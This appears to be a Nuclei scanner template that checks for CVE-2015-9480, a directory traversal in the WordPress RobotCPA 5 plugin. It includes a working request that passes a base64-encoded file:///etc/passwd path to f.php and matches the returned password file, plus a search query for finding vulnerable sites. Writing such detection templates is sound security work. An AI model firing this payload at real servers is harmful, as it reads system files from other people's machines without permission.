id: CVE-2015-9480 info: name: WordPress RobotCPA 5 - Directory Traversal author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. remediation: | Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37252 - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 epss-score: 0.29071 epss-percentile: 0.96398 cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: robot-cpa product: robotcpa framework: wordpress google-query: inurl:"/wp-content/plugins/robotcpa" tags: wp-plugin,lfi,edb,cve,cve2015,wordpress http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a004730450221009997ec995ee4dd24cf1d4f7977156c322fd1fb68e278e0a23520e7c35efd22a7022057ed6d8bf3a205a6e70e3068678eb02f76b9ae22c5ffc81a87b412dcbd584cd4:922c64590222798bb761d5b6d8e72950